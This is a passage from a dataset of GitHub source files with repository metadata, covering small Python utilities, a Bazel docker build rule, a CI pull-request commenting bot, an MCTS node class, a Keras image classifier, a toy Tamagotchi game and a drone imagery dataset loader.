cv2.cvtColor(image.copy(), cv2.COLOR_BGR2BGRA)\n\n for pixel in non_zero_pixels:\n x, y = pixel[0][1], pixel[0][0]\n new_image[x][y] = np.array([0, 0, 0, 0], np.uint8)\n\n cv2.imwrite('new.png', new_image)\n\n\ndef main():\n file_name = sys.argv[1]\n image = cv2.imread(file_name)\n new_image = color_range_to_transparent(image, GREEN_RANGE_MIN,\n GREEN_RANGE_MAX)\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kimmobrunfeldt/random_python_utils","sub_path":"color_to_transparent.py","file_name":"color_to_transparent.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"86707464565","text":"#-*- coding:utf-8 -*-\nimport unittest\nimport yaml\nfrom source.utilities.mclang import mclang_to_dict\nfrom source.utilities.splitter import dict_split\n\n\nclass TestSplitter(unittest.TestCase):\n\n def test_splitter(self):\n\n lang_file = open('test/test3.lang', 'r', encoding='utf-8')\n lang = mclang_to_dict(lang_file, lambda x: x.strip().startswith('S:'))\n\n config_file = open('config/division.yml', 'r', encoding='utf-8')\n config = yaml.load(config_file)\n\n test_result = dict_split(lang, config)\n test_ans = {'tooltip': {'S:gt.tooltip.blah': 'blah tooltip', 'S:gt.multiitem.blaah.tooltip': 'blaah tooltip'},\n 'gt_multiitem': {'S:gt.multiitem.blaah.name': 'blaah'}, 'misc': {'S:enchantment.blaaah': 'enchantment blaaah'}}\n\n self.assertDictEqual(test_result, test_ans)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"TeamNED/gregtech6-chinese-translation","sub_path":"test/test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"69"}
+{"seq_id":"42102399600","text":"def docker_build_impl(ctx):\n args = []\n if not ctx.attr.use_cache:\n args += ['--force-rm', '--no-cache']\n cmd = '\\n'.join([\n \"set -e\",\n \"rm -rf _docker_ctx\",\n \"mkdir _docker_ctx\",\n \"srcs=(%s)\" % (cmd_helper.join_paths(\" \", set(ctx.files.data))),\n \"for src in ${srcs[@]}; do\",\n \" dir=$(dirname $src)\",\n \" dir=${dir#%s}\" % (ctx.configuration.bin_dir.path),\n \" dir=${dir#%s}\" % (ctx.configuration.genfiles_dir.path),\n \" mkdir -p _docker_ctx/$dir\",\n \" cp -L --preserve=all $src _docker_ctx/$dir\",\n \"done\",\n \"cp %s _docker_ctx\" % (ctx.file.src.path),\n \"cd _docker_ctx\",\n \"docker build -t %s %s .\" % (ctx.attr.image_name, ' '.join(args)),\n \"touch ../\" + ctx.outputs.done_marker.path,\n ])\n ctx.action(\n inputs = [ctx.file.src] + ctx.files.deps + ctx.files.data,\n outputs = [ctx.outputs.done_marker],\n mnemonic = 'DockerBuild',\n command = cmd,\n use_default_shell_env = True)\n\n return struct(dockerfile = ctx.file.src)\n\ndocker_build = rule(\n docker_build_impl,\n attrs = {\n \"src\": attr.label(\n allow_files = True,\n single_file = True,\n ),\n \"image_name\": attr.string(),\n \"data\": attr.label_list(allow_files = True),\n \"deps\": attr.label_list(\n providers = [\"dockerfile\"],\n ),\n \"use_cache\": attr.bool(),\n },\n outputs = {\"done_marker\": \"%{name}.done\"},\n)\n","repo_name":"google/shipshape","sub_path":"tools/build_rules/docker.bzl","file_name":"docker.bzl","file_ext":"bzl","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":266,"dataset":"github-code","pt":"69"}
+{"seq_id":"4376368225","text":"import Adafruit_DHT as dht\nimport requests\nfrom dotenv import dotenv_values\nimport asyncio\n\nconfig = dotenv_values(\"../.env\")\nurl = config[\"URL\"]\nuuid = config[\"UUID\"]\n\nasync def main():\n print(\"starting...\")\n while True:\n humidity, temperature = dht.read_retry(dht.DHT22, 4, delay_seconds=5)\n if humidity is None or temperature is None:\n # read_retry can give up and return (None, None); skip this cycle\n await asyncio.sleep(5)\n continue\n humidity = round(humidity, 2)\n temperature = round(temperature, 2)\n print(f\"temp={temperature:0.2f} humi={humidity:0.2f}\")\n\n res = requests.post(\n url=url,\n json={\n \"uuid\": uuid,\n \"temperature\": temperature,\n \"humidity\": humidity,\n },\n )\n\n if res.status_code != 200:\n print(res.status_code)\n print(res.text)\n \n await asyncio.sleep(60)\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"noname2048/cj-rasp","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"26379328013","text":"# Problem 2\r\n\r\n# Find the sum of all the even-valued terms in the\r\n# Fibonacci sequence which do not exceed four million.\r\n\r\ni = 1\r\nj = 0\r\nfib = [1, 2]\r\nfib_even = [2]\r\n\r\nwhile fib[i] <= 4000000:\r\n j = fib[i] + fib[i-1]\r\n if j <= 4000000:\r\n fib.append(j)\r\n if j%2 == 0:\r\n fib_even.append(j)\r\n else:\r\n break\r\n \r\n i += 1\r\n \r\n\r\nprint(fib)\r\nprint(fib_even)\r\nprint(sum(fib_even))\r\n \r\n\r\n\r\n\r\n","repo_name":"parrott-kevin/project-euler","sub_path":"python/problem_02.py","file_name":"problem_02.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29659799218","text":"import os\nimport logging\nfrom typing import Dict, Any, Optional, List\n\nfrom .git_utils import GitHubRepo, DRY_RUN\nfrom .github_commenter import BotCommentBuilder, Item\nfrom .github_skipped_tests_comment import get_skipped_tests_comment\nfrom .github_tag_teams import get_tags\nfrom .github_docs_comment import get_doc_url\nfrom .ci_runtime import ci_runtime_comment\n\nPR_QUERY = \"\"\"\n query ($owner: String!, $name: String!, $number: Int!) {\n repository(owner: $owner, name: $name) {\n pullRequest(number: $number) {\n title\n body\n state\n isDraft\n number\n baseRefOid\n author {\n login\n }\n labels(first:100) {\n nodes {\n name\n }\n }\n comments(last: 100) {\n pageInfo {\n hasPreviousPage\n }\n nodes {\n author {\n login\n }\n databaseId\n body\n }\n }\n commits(last: 1) {\n nodes {\n commit {\n oid\n statusCheckRollup {\n contexts(first: 100) {\n pageInfo {\n hasNextPage\n }\n nodes {\n ... on StatusContext {\n state\n context\n targetUrl\n }\n }\n }\n }\n }\n }\n }\n }\n }\n }\n\"\"\"\n\n\n# TODO: These are all disabled for now, as they get ported over to lambda we can\n# turn them back on\nCOMMENT_SECTIONS = {\n \"ccs\": lambda pr_data, github: get_tags(pr_data, github, team_issue=10317),\n \"skipped-tests\": lambda pr_data, github: get_skipped_tests_comment(\n pr_data, github=github\n ),\n \"docs\": lambda pr_data, github: get_doc_url(pr_data),\n \"runtime\": lambda pr_data, github: ci_runtime_comment(pr_data, github),\n}\n\n\ndef github_pr_comment(\n webhook_pr_data: Dict[str, Any],\n user: str,\n repo: str,\n dry_run: bool,\n commenters: Optional[List[str]] = None,\n):\n logger = logging.getLogger(\"py-github\")\n test_data = None\n github = GitHubRepo(\n user=user,\n repo=repo,\n token=DRY_RUN if dry_run else os.environ[\"GITHUB_TOKEN\"],\n test_data=test_data,\n )\n logger.info(f\"Generated github: {github}\")\n\n pr_data = github.graphql(\n PR_QUERY,\n {\n \"owner\": user,\n \"name\": repo,\n \"number\": webhook_pr_data[\"number\"],\n },\n )\n\n pr_data = pr_data[\"data\"][\"repository\"][\"pullRequest\"]\n commenter = BotCommentBuilder(github=github, data=pr_data)\n\n items = {}\n for key, generator in COMMENT_SECTIONS.items():\n if commenters is not None and key not in commenters:\n continue\n\n logging.info(f\"Processing commenter: {key}\")\n # Don't re-fetch items that have declared themselves done\n if not commenter.is_done(key):\n try:\n _, content = generator(pr_data, github)\n items[key] = Item(key=key, text=content, is_done=False)\n except Exception as e:\n logger.exception(e)\n\n logger.info(f\"Commenting {len(items)} items: {items}\")\n commenter.post_items(items=list(items.values()))\n","repo_name":"tlc-pack/ci","sub_path":"terraform/tvm_bot/tvm_bot/github_pr_comment.py","file_name":"github_pr_comment.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"11843746302","text":"from setuptools import setup, find_packages\nimport os\nimport sys\n\n\nif sys.version_info[0] < 3:\n with open('README.md') as f:\n long_description = f.read()\nelse:\n with open('README.md', encoding='utf-8') as f:\n long_description = f.read()\n\nwith(open(\"version.txt\", \"r\")) as f:\n version = f.read()\n\nwith(open(\"requirements.txt\", \"r\")) as f:\n requirements = f.read()\n\n\nsetup(\n name='effcossim',\n version=version,\n description='Efficient Pairwise Cosine Similarity Computation',\n long_description=long_description,\n long_description_content_type='text/markdown',\n author='ngshya',\n author_email='ngshya@gmail.com',\n url='https://github.com/ngshya/effcossim',\n license='GPLv3',\n packages=find_packages(exclude=[\"tests\"]),\n install_requires=requirements,\n include_package_data=True,\n)","repo_name":"ngshya/effcossim","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"39234504448","text":"\nimport numpy as np\n\nfrom collections import defaultdict\n\nfrom lib.mcts.utils.factory import safe_deepcopy_env\n\n\nclass Node(object):\n \"\"\"A tree node.\n \"\"\"\n\n def __init__(self, parent, planner):\n \"\"\"New node.\n\n :param parent: its parent node\n :param planner: the planner using the node\n\n Parameters\n ----------\n parent : Node\n Its parent node.\n planner : AbstractPlanner\n The planner using the node.\n \"\"\"\n\n self.parent = parent\n self.planner = planner\n\n # Dict of children nodes, indexed by action labels.\n self.children = {}\n\n # Number of times the node was visited.\n self.count = 0\n\n def get_value(self) -> float:\n \"\"\"Evaluate the node return.\n\n Returns\n -------\n float\n An estimate of the node value.\n\n Raises\n ------\n NotImplementedError\n This function is abstract and must be defined separately \n in each agent that inherits this class.\n \"\"\"\n raise NotImplementedError()\n\n def expand(self, branching_factor):\n \"\"\"Expand the node and discover children.\n\n Parameters\n ----------\n branching_factor : int\n The number of the node's children.\n \"\"\"\n for a in range(branching_factor):\n self.children[a] = type(self)(self, self.planner)\n\n def selection_rule(self):\n \"\"\"A selection criterion.\n\n Raises\n ------\n NotImplementedError\n This function is abstract and must be defined separately \n in each agent that inherits this class.\n \"\"\"\n raise NotImplementedError()\n\n @staticmethod\n def breadth_first_search(root, operator=None, condition=None, condition_blocking=True):\n \"\"\"Breadth-first search of all paths to nodes that meet a given condition.\n\n Parameters\n ----------\n root : Node\n Starting node.\n operator : bool, optional\n Will be applied to all traversed nodes, by default None\n condition : function, optional\n Nodes meeting that condition will be returned, by default None\n condition_blocking : bool, optional\n Do not explore a node which met the condition, by default True\n\n Yields\n ------\n List\n List of paths to nodes that met the condition.\n \"\"\"\n queue = [(root, [])]\n while queue:\n (node, path) = queue.pop(0)\n if (condition is None) or condition(node):\n returned = operator(node, path) if operator else (node, path)\n yield returned\n if (condition is None) or not condition_blocking or not condition(node):\n for next_key, next_node in node.children.items():\n queue.append((next_node, path + [next_key]))\n\n def is_leaf(self):\n return not self.children\n\n def path(self):\n \"\"\"Computes the path of action labels from the root to the node.\n\n Returns\n -------\n List[Node]\n Sequence of action labels from the root to the node.\n \"\"\"\n node = self\n path = []\n while node.parent:\n for a in node.parent.children:\n if node.parent.children[a] == node:\n path.append(a)\n break\n node = node.parent\n return reversed(path)\n\n def sequence(self):\n \"\"\"Computes the path from the root to the node.\n\n Returns\n -------\n List[Node]\n A sequence of nodes from the root to the node.\n \"\"\"\n node = self\n path = [node]\n while node.parent:\n path.append(node.parent)\n node = node.parent\n return reversed(path)\n\n @staticmethod\n def all_argmax(x):\n \"\"\"Returns the non-zero elements of a np.ndarray like \n structure which are the row-wise maximum values of that\n structure.\n\n Parameters\n ----------\n x : np.ndarray\n The numpy.array-like structure.\n\n Returns\n -------\n np.ndarray\n The list of indexes of all maximums of `x`.\n \"\"\"\n m = 
np.amax(x)\n        return np.nonzero(x == m)[0]\n\n    def random_argmax(self, x):\n        \"\"\"Randomly tie-breaking `argmax`.\n        \n        Parameters\n        ----------\n        x : np.ndarray\n            An array\n\n        Returns\n        -------\n        int\n            A random index among the maximums.\n        \"\"\"\n        indices = Node.all_argmax(x)\n        return self.planner.np_random.choice(indices)\n\n    def __str__(self):\n        return \"{} (n:{}, v:{:.2f})\".format(list(self.path()), self.count, self.get_value())\n\n    def __repr__(self):\n        return '<node {}>'.format(id(self))\n\n    def get_trajectories(self, full_trajectories=True, include_leaves=True):\n        \"\"\"Get a list of visited nodes corresponding to the node subtree.\n\n        Parameters\n        ----------\n        full_trajectories : bool, optional\n            Return a list of observation sequences, else a list of observations, by default True\n        include_leaves : bool, optional\n            Include leaves or only expanded nodes, by default True\n\n        Returns\n        -------\n        List\n            The list of trajectories.\n        \"\"\"\n        trajectories = []\n        if self.children:\n            for action, child in self.children.items():\n                child_trajectories = child.get_trajectories(\n                    full_trajectories, include_leaves)\n                if full_trajectories:\n                    trajectories.extend(\n                        [[self] + trajectory for trajectory in child_trajectories])\n                else:\n                    trajectories.extend(child_trajectories)\n            if not full_trajectories:\n                trajectories.append(self)\n        elif include_leaves:\n            trajectories = [[self]] if full_trajectories else [self]\n        return trajectories\n\n    def get_obs_visits(self, state=None):\n        \"\"\"Get number of visits given an observation.\n\n        Parameters\n        ----------\n        state : np.ndarray, optional\n            The given observation, by default None\n\n        Returns\n        -------\n        Tuple[int, int]\n            The number of visits.\n        \"\"\"\n        visits = defaultdict(int)\n        updates = defaultdict(int)\n        if hasattr(self, \"observation\"):\n            for node in self.get_trajectories(full_trajectories=False,\n                                              include_leaves=False):\n                if hasattr(node, \"observation\"):\n                    visits[str(node.observation)] += 1\n                if hasattr(node, \"updates_count\"):\n                    updates[str(node.observation)] += node.updates_count\n        else:\n            # Replay required\n            for node in self.get_trajectories(full_trajectories=False,\n                                              include_leaves=False):\n                replay_state = safe_deepcopy_env(state)\n                for action in node.path():\n                    observation, _, _, _ = replay_state.step(action)\n                visits[str(observation)] += 1\n        return visits, updates\n","repo_name":"AndreasKaratzas/omniboost-v1","sub_path":"lib/mcts/src/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":7327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"37201125452","text":"import numpy as np\nimport os\nfrom keras.preprocessing import image\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Conv2D\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Flatten, Activation\nfrom keras.layers.core import Dropout\nfrom keras.layers import LeakyReLU, Dropout\nfrom keras.layers import BatchNormalization\nimport datetime\n\ndropout = 0.4\nclassifier = Sequential()\n\nclassifier.add(Conv2D(64, (3, 3), input_shape=(128, 128, 3)))\nclassifier.add(LeakyReLU(alpha=0.2))\nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\nclassifier.add(Dropout(dropout))\nclassifier.add(Conv2D(64, (3, 3)))\nclassifier.add(LeakyReLU(alpha=0.2))\nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\nclassifier.add(Dropout(dropout))\nclassifier.add(Conv2D(64, (3, 3)))\nclassifier.add(LeakyReLU(alpha=0.2))\nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\nclassifier.add(Dropout(dropout))\nclassifier.add(Conv2D(64, (3, 3)))\nclassifier.add(LeakyReLU(alpha=0.2))\nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\nclassifier.add(Dropout(dropout))\n\nclassifier.add(Flatten())\nclassifier.add(Dropout(0.5))\nclassifier.add(Dense(units=256, activation='relu'))\nclassifier.add(Dropout(0.5))\nclassifier.add(Dense(units=10, activation='sigmoid'))\n\nclassifier.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n\n# Image preprocessing\nfrom keras.preprocessing.image import ImageDataGenerator\n\ntrain_datagen = ImageDataGenerator(\n rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True,\n vertical_flip=True,\n rotation_range=90,\n width_shift_range=0.2,\n height_shift_range=0.2)\n\ntest_datagen = ImageDataGenerator(rescale=1. / 255)\n\ntraining_set = train_datagen.flow_from_directory(\n 'training_set/second_attempt',\n target_size=(128, 128),\n batch_size=32,\n class_mode='categorical')\n\ntest_set = test_datagen.flow_from_directory(\n 'test_set/second_attempt',\n target_size=(128, 128),\n batch_size=32,\n class_mode='categorical')\n\nclassifier.fit_generator(training_set, steps_per_epoch=250, epochs=25, validation_data=test_set, validation_steps=65)\n\n# Single classifications to simulate real use case in the Android application\n# product_names array stores the directory names where the test pictures will come from\n# Corresponds to the one hot encoding of the classifier\nproduct_names = ['apple', 'banana', 'cocoa', 'coffee', 'cucumber', 'onion', 'peach', 'potato', 'strawberry', 'tomato']\n# Dictionary to store the number of correct predictions for each class\ncorrect = dict()\nfor name in product_names:\n count = 0\n for img_name in os.listdir('D:\\\\ImageNet\\\\dataset\\\\training_set\\\\second_attempt\\\\' + name + '\\\\testing'):\n test_image = image.load_img(img_name, target_size = (128, 128))\n test_image = image.img_to_array(test_image)\n test_image = np.expand_dims(test_image, axis = 0)\n result = classifier.predict(test_image)\n index = np.where(result==1)\n if index[1] != []:\n count += 1\n correct[name] = count\nprint(correct)","repo_name":"akrstova/cnn-gan-experiments","sub_path":"cnn/single_classifications.py","file_name":"single_classifications.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"72454040540","text":"n= int(input())\nlis = [int(i) for i in input()]\nchanges = 0\nans = 0\n\nfor i in range(n-1, -1, -1):\n if (changes+lis[i])%2 == 1:\n changes += 1\n ans += 1\n\nprint(ans)","repo_name":"AlanBui1/Competitive-Programming-Solutions","sub_path":"fts.py","file_name":"fts.py","file_ext":"py","file_size_in_byte":179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5659091977","text":"# Ejemplo de como usar cámara móvil Android desde OpenCV\n#\n# Descargar e instalar en Android IP Webcam\n# Configurar la resolución y calidad de video para mejorar la velocidad de transmisión\n# Iniciar servidor\n# Copiar la dirección IP del servicio\n# Modificar la dirección URL en el código\n\n\nimport requests\nimport cv2\nimport numpy as np\n\n \n#Modificar aquí la dirección del servicio\nurl = \"http://192.168.100.65:8080/shot.jpg\"\n \n\nwhile True:\n img_resp = requests.get(url)\n img_arr = np.array(bytearray(img_resp.content), dtype=np.uint8)\n img = cv2.imdecode(img_arr, -1)\n\n # width = int(img.shape[1] * 50 / 100)\n # height = int(img.shape[0] * 50 / 100)\n # dsize = (width, height)\n # output = cv2.resize(img, dsize)\n # cv2.imshow(\"Android_cam\", img)\n\n cv2.imshow(\"Android_cam\", img)\n \n # Press Esc key to exit\n if cv2.waitKey(1) == 27:\n break\n \ncv2.destroyAllWindows()\n","repo_name":"ArturoBL/OpenCV","sub_path":"Python/Basic/WirelessIPCam/WirelessIPCam.py","file_name":"WirelessIPCam.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30669894146","text":"#!/usr/bin/env python \n# _*_ coding:utf-8 _*_ \n# \n# @Version : 1.0 \n# @Time : 08/08/2018 2:25 PM \n# @Author : yanxuewu \n# @File : data_load.py\nimport os\nimport queue\nimport random\nimport threading\nfrom PIL import Image\nimport numpy as np\nfrom data.data_preprocess import batch_process\nclass DataLoader(object):\n\tdef __init__(self, data_path, data_type, distort_types):\n\t\t#super(DataLoader, self).__init__(data_path, data_type, distort_types)\n\t\tself.data_path = data_path\n\t\tself.data_type = data_type\n\t\tself.distort_types = distort_types\n\n\tdef load_data(self, batch_size, shuffle):\n\t\t'''\n\t\tThis method should be implemented by its subclasses\n\t\t:return: a batch of data\n\t\t'''\n\n\t\traise NotImplementedError\n\n\nclass TwoAfcDataLoader(DataLoader):\n\tdef __init__(self, data_path, data_type='train', distort_types=['cnn', 'mix', 'traditional']):\n\t\t'''\n\t\t:param data_path: str, the data stored path\n\t\t:param data_type: str, optional 'train', 'val'\n\t\t:param distort_types: ndarray, ['cnn', 'mix', 'traditional', ...]\n\t\t'''\n\t\tsuper(TwoAfcDataLoader, self).__init__(data_path, data_type, distort_types)\n\n\t\t# distort type paths\n\t\tdistort_paths = []\n\t\tfor distort_type in distort_types:\n\t\t\tdistort_paths.append(os.path.join(data_path, data_type, distort_type))\n\n\t\tinput_paths = []\n\n\t\tele_paths = ['ref', 'p0', 'p1', 'judge']\n\t\tfor path in distort_paths:\n\t\t\tprint('Searching current input path: ', path)\n\t\t\tc_file_names = os.listdir(os.path.join(path, ele_paths[0]))\n\t\t\tfor img_name in c_file_names:\n\t\t\t\tprint('Searching input images: ', img_name)\n\t\t\t\tc_ref_path = os.path.join(path, ele_paths[0], img_name)\n\t\t\t\tc_p0_path = os.path.join(path, ele_paths[1], img_name)\n\t\t\t\tc_p1_path = os.path.join(path, ele_paths[2], img_name)\n\t\t\t\tc_judge_path = os.path.join(path, ele_paths[3], img_name[:-3]+'npy')\n\n\t\t\t\tinput_path_tuple = (c_ref_path, c_p0_path, c_p1_path, c_judge_path)\n\t\t\t\tinput_paths.append(input_path_tuple)\n\n\t\tself.input_paths = input_paths\n\n\tdef load_data(self, batch_size, shuffle=True):\n\t\t'''\n\n\t\t:param batch_size:\n\t\t:return: ndarray with size [batch_size, 4] where [:, 0] is the\n\t\t'''\n\n\t\tinput_queue = queue.Queue(maxsize=5*batch_size)\n\n\t\tdef en_queue():\n\t\t\twhile True:\n\t\t\t\trandom.shuffle(self.input_paths) # Shuffle data in each epoch\n\t\t\t\tfor ele in self.input_paths:\n\t\t\t\t\tinput_queue.put(ele)\n\t\tself.queue_thread = threading.Thread(target=en_queue)\n\t\t# When the major thread is finished, this thread would be killed immediately.\n\t\tself.queue_thread.setDaemon(True)\n\t\tself.queue_thread.start()\n\n\t\tdef convert_paths_to_data(paths):\n\t\t\tc_data = []\n\t\t\tfor one_input_path in paths:\n\t\t\t\t# ndarray\n\t\t\t\tref_img_ = Image.open(one_input_path[0]).convert('RGB')\n\t\t\t\tp0_img_ = Image.open(one_input_path[1]).convert('RGB')\n\t\t\t\tp1_img_ = Image.open(one_input_path[2]).convert('RGB')\n\n\t\t\t\t# Preprocess the input data\n\t\t\t\t# The input data must be in [0, 255]\n\t\t\t\t# process an image object and return a ndarray with shape [H, W, C]\n\t\t\t\tref_img = batch_process(ref_img_)[0]\n\t\t\t\tp0_img = batch_process(p0_img_)[0]\n\t\t\t\tp1_img = batch_process(p1_img_)[0]\n\t\t\t\t# float32\n\t\t\t\tjudge = np.load(one_input_path[3])[0]\n\t\t\t\tc_data.append((ref_img, p0_img, p1_img, judge))\n\t\t\treturn c_data\n\n\t\tbatch_data_path = []\n\t\twhile True:\n\t\t\tfor i in 
range(batch_size):\n\t\t\t\tbatch_data_path.append(input_queue.get())\n\t\t\t# Convert path to instance\n\t\t\tbatch_data = convert_paths_to_data(batch_data_path)\n\t\t\tyield batch_data\n\t\t\tbatch_data_path = []\n\n\nclass JndDataLoader(DataLoader):\n\tdef __init__(self, data_path, data_type='val', distort_types=['cnn', 'traditional']):\n\t\t'''\n\t\t:param data_path: str, the data stored path\n\t\t:param data_type: str, optional 'train', 'val'\n\t\t:param distort_types: ndarray, ['cnn', 'mix', 'traditional', ...]\n\t\t'''\n\t\tsuper(JndDataLoader, self).__init__(data_path, data_type, distort_types)\n\t\t#TODO\n\n\n\tdef load_data(self, batch_size, shuffle=True):\n\n\t\tprint('This is the jnd data loader implementation')\n\t\t# TODO\n\t\tpass\n\n\nclass TFRecordConverter(object):\n\tdef __init__(self, data_path, data_type='train'):\n\t\tpass\n\n","repo_name":"xuehuachunsheng/PerceptualSimilarity_TF","sub_path":"data/data_load.py","file_name":"data_load.py","file_ext":"py","file_size_in_byte":4006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"26486567553","text":"# програмка принимает у юзера четыре символа сразу и выдает их задом наперед\n\nlist = []\n\nele = input(\"Print any 4 symbols: \")\nfor x in ele: \n list.append(x)\n\ni = 3\nwhile i >= 0:\n print(list[i], end=\"\")\n i = i - 1\n\n \n","repo_name":"dobrodiy555/portfolio","sub_path":"Python programs/Symbols vice versa.py","file_name":"Symbols vice versa.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"21939534184","text":"import time\n\nclass Tamagotchi:\n t = time.time()\n def __init__( self, name, hungry, stamina, energy):\n self.name = name\n self.hungry = hungry\n self.stamina = stamina\n self.energy = energy\n\n def play(self):\n self.stamina += 2\n self.energy -= 1\n\n def feed(self):\n self.stamina += 1\n self.hungry -= 2\n\n def sleep(self):\n self.hungry += 1\n self.energy += 2\n \n def lapse(self):\n t1 = time.time()\n time_ = int( t1 - Tamagotchi.t )\n\n self.stamina -= time_\n self.hungry += time_\n self.energy -= time_\n Tamagotchi.t = t1\n print(f\"Total time : { time_ }\")\n\n def status(self):\n return (f\"Name: {self.name}\\nStatus:\\nHungry: {self.hungry} | Stamina: {self.stamina} | Energy: {self.energy} \") \n\n# Main App\n\nt = Tamagotchi('Tamagotchi 1', 10, 100, 100)\n\nprint(t.status())\nprint(\"Options:\\n1: play\\n2: feed: \\n3: sleep\")\n\noption=int(input(\"Choose one option or press 0 to exit: \"))\n\nwhile option !=0 and t.hungry >= 0 and t.hungry < 100 and t.stamina > 0 and t.energy > 0:\n if option==1:\n t.play()\n elif option==2:\n t.feed()\n elif option==3:\n t.sleep()\n else:\n print(\"Invalid option.\")\n t.lapse()\n print(t.status())\n if t.hungry >= 0 and t.hungry < 100 and t.stamina > 0 and t.energy > 0:\n print(\"Options:\\n1: play\\n2: feed: \\n3: sleep\")\n option=int(input(\"Choose one option or press 0 to exit: \"))\n\nif option != 0:\n print(\"Game Over\")","repo_name":"jhonnierandrey/d-army","sub_path":"python/tamagotchi.py","file_name":"tamagotchi.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"35497631837","text":"'''\nAuthor: your name\nDate: 2022-02-10 20:29:18\nLastEditTime: 2022-02-12 16:38:08\nLastEditors: Please set LastEditors\nDescription: 打开koroFileHeader查看配置 进行设置: https://github.com/OBKoro1/koro1FileHeader/wiki/%E9%85%8D%E7%BD%AE\nFilePath: \\Workspace\\XML\\block4\\task19.py\n'''\n'''\nAuthor: your name\nDate: 2022-02-10 20:29:18\nLastEditTime: 2022-02-12 16:18:27\nLastEditors: Please set LastEditors\nDescription: 打开koroFileHeader查看配置 进行设置: https://github.com/OBKoro1/koro1FileHeader/wiki/%E9%85%8D%E7%BD%AE\nFilePath: \\Workspace\\XML\\block4\\task19.py\n'''\nimport rdflib\nimport owlrl\n\ngraph = rdflib.Graph()\ngraph.parse(\"C:\\\\Users\\\\ydzat\\\\OneDrive\\\\Workspace\\\\XML\\\\block4\\\\Schulpersonal.rdf\")\ngraph.parse(\"C:\\\\Users\\\\ydzat\\\\OneDrive\\\\Workspace\\\\XML\\\\block4\\\\Schulpers.owl\")\nper = rdflib.Namespace(\"http://example.org/personal/per#\")\nowlrl.DeductiveClosure(owlrl.OWLRL_Semantics).expand(graph)\n\nprint(\"Brothers\")\nfor s, o in graph.subject_objects(per.isBrother):\n if not (s == o):\n print(s, \"is brother of\", o)\n","repo_name":"ydzat/Workspace","sub_path":"XML/block4/task19.py","file_name":"task19.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"43744787220","text":"\"\"\"Drone Deploy Dataset - Semantic Segmentation.\"\"\"\nfrom PIL import Image\nimport sys\nimport os\nimport numpy as np\nimport random\nimport cv2\n\nfrom typing import Any, Callable, Optional, Tuple\nfrom .vision import VisionDataset\nfrom earthvision.constants.DroneDeploy.config import (\n train_ids,\n val_ids,\n test_ids,\n LABELMAP,\n INV_LABELMAP,\n)\nfrom earthvision.datasets.utils import _urlretrieve\n\n\nclass DroneDeploy(VisionDataset):\n \"\"\"Drone Deploy Semantic Dataset.\n\n Args:\n root (string): Root directory of dataset.\n dataset_type (string, optional): Choose dataset type.\n data_mode (int): 0 for train data, 1 for validation data, and 2 for testing data\n transform (callable, optional): A function/transform that takes in an PIL image and\n returns a transformed version. E.g, transforms.RandomCrop\n target_transform (callable, optional): A function/transform that takes in the\n target and transforms it.\n download (bool, optional): If true, downloads the dataset from the internet and\n puts it in root directory. If dataset is already downloaded, it is not\n downloaded again.\n\n \"\"\"\n\n resources = {\n \"dataset-sample\": \"https://dl.dropboxusercontent.com/s/h8a8kev0rktf4kq/dataset-sample.tar.gz?dl=0\",\n \"dataset-medium\": \"https://dl.dropboxusercontent.com/s/r0dj9mhyv4bgbme/dataset-medium.tar.gz?dl=0\",\n }\n\n def __init__(\n self,\n root: str,\n dataset_type=\"dataset-sample\",\n data_mode: int = 0,\n transform: Optional[Callable] = None,\n target_transform: Optional[Callable] = None,\n download: bool = False,\n ) -> None:\n\n super(DroneDeploy, self).__init__(\n root, transform=transform, target_transform=target_transform\n )\n\n self.root = root\n self.dataset_type = dataset_type\n self.filename = f\"{dataset_type}.tar.gz\"\n self.filepath = os.path.join(self.root, self.filename)\n self.data_mode = data_mode\n self.label_path = f\"{dataset_type}/label-chips\"\n self.image_path = f\"{dataset_type}/image-chips\"\n\n if download and 